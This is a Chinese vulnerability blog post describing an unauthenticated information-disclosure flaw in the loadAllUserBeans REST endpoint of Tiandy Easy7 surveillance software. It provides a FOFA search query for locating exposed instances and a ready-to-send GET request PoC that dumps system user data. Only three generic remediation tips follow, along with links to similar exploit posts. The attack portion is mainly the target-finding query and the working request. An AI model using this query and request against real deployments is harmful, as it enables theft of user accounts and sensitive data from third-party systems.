天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞

天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞

0508

漏洞信息

项目 内容
漏洞名称 天地伟业Easy7 loadAllUserBeans接口敏感信息泄露
漏洞类型 敏感信息泄露
影响组件 loadAllUserBeans
影响版本 天地伟业Easy7

漏洞概述

天地伟业Easy7系统loadAllUserBeans接口存在敏感信息泄露漏洞,攻击者可直接获取系统用户敏感信息。

fofa查询语句

app="Tiandy-Easy7"

漏洞复现

POC

GET /Easy7/rest/user/loadAllUserBeans HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

漏洞特征

  • 路径:/Easy7/rest/user/loadAllUserBeans
  • HTTP方法:GET

修复建议

  1. 打补丁
  2. 增加接口认证
  3. 限制敏感信息访问
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
漏洞复现
# 漏洞复现
喜欢就支持一下吧
点赞8 分享
admin的头像-吾要学习
东胜物流软件GetData接口SQL注入漏洞-吾要学习
东胜物流软件GetData接口SQL注入漏洞
东胜物流软件GetData接口SQL注入漏洞
9小时前 48
青龙面板dependencies接口远程代码执行漏洞-吾要学习
青龙面板dependencies接口远程代码执行漏洞
青龙面板dependencies接口远程代码执行漏洞
9小时前 44
安科瑞企业微电网能效管理系统 默认密码漏洞-吾要学习
安科瑞企业微电网能效管理系统 默认密码漏洞
安科瑞企业微电网能效管理系统 默认密码漏洞
8小时前 38
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析-吾要学习
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析
12小时前 34
Chroma DB swagger 敏感信息泄露漏洞-吾要学习
Chroma DB swagger 敏感信息泄露漏洞
Chroma DB swagger 敏感信息泄露漏洞
8小时前 30
畅捷通TPlus FormReportOperateAction.aspx 任意文件读取漏洞分析-吾要学习
畅捷通TPlus FormReportOperateAction.aspx 任意文件读取漏洞分析
畅捷通TPlus FormReportOperateAction.aspx 任意文件读取漏洞分析
13小时前 29
相关推荐
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞-吾要学习
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞
9小时前 50
东胜物流软件GetData接口SQL注入漏洞-吾要学习
东胜物流软件GetData接口SQL注入漏洞
东胜物流软件GetData接口SQL注入漏洞
9小时前 48
青龙面板dependencies接口远程代码执行漏洞-吾要学习
青龙面板dependencies接口远程代码执行漏洞
青龙面板dependencies接口远程代码执行漏洞
9小时前 44
安科瑞企业微电网能效管理系统 默认密码漏洞-吾要学习
安科瑞企业微电网能效管理系统 默认密码漏洞
安科瑞企业微电网能效管理系统 默认密码漏洞
8小时前 38
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析-吾要学习
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析
12小时前 34
Chroma DB swagger 敏感信息泄露漏洞-吾要学习
Chroma DB swagger 敏感信息泄露漏洞
Chroma DB swagger 敏感信息泄露漏洞
8小时前 30
评论 抢沙发

请登录后发表评论

    暂无评论内容